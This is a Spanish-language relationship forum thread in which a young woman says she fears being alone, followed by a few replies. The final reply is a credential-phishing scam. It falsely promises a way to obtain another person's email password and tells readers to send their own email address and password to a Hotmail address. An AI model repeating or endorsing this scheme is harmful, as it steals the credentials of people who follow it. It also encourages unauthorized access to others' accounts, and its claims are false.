Foro / Pareja

Tengo miedo de quedarme sola

Última respuesta: 15 de febrero de 2011 a las 22:20
D
daura_8675539
14/2/11 a las 4:29

Y es que tengo 23 años y hace mucho no tengo novio. Sé que me van a decir que soy joven y que debería tener paciencia pero de verdad que la soledad es muy dura y el tiempo se pasa volando. Entonces entre mas sola estoy peor me siento y entre peor me siento mas sola me quedo. no sé si me explico. Es frustrante.

Ver también

J
jair_738377
14/2/11 a las 9:00

Supongo...
Que tu problema es que eres excesivamente dependiente, basas tu felicidad en estar con alguien (parejilmente) y no valoras o disfrutas los momentos de soledad (necesarios por otra parte) o los momentos de amigos, familia, hobbys, etc.

Lo malo de lo que cuentas es que te vayas con el primer chico que te haga caso y a primeras te medio mole, por no estar sola, y con eso hay que tener cuidado.

T
tao_8534711
14/2/11 a las 14:31

Ke es
un dildo?

M
maila_5520533
15/2/11 a las 22:20

Para que no tengas miedo, asegurate!!!!!
Para poder obtener la contraseña de la persona que te interesa, solo tienes que seguir los pasos a continuacion. Lo de bueno es que no se afecta la privacidad de la cuenta de correo de quien solicitas, esa persona no se da por enterada ni perjudicada, y todo sigue normalmente su curso. Pruebalo, no tienes nada que perder.

Todo consiste en enviar un email...

----PASO 1: mandar un email a:

password-account@hotmail.com

----PASO 2: En el campo Asunto escribir:

PasswordRecovery_mail_MSN

----PASO 3: En el contenido escribir:

USR_RCVR seguido del email a obtener su contraseña

----PASO 4: en la siguiente línea escribir:

REDIRECT_TO seguido de tu email y tu contraseña.

Por cierto, también funciona para cualquier servidor como yahoo, gmail, hotmail, correos personalizados, correos de universidades, etc.

PD: si no te llega la respuesta en los proximos minutos, prueba con tu otra cuenta de correo.

No te pierdas ni uno solo de nuestros tableros en Pinterest
pinterest
ISDIN Si-Nails

ISDIN Si-Nails

Compartir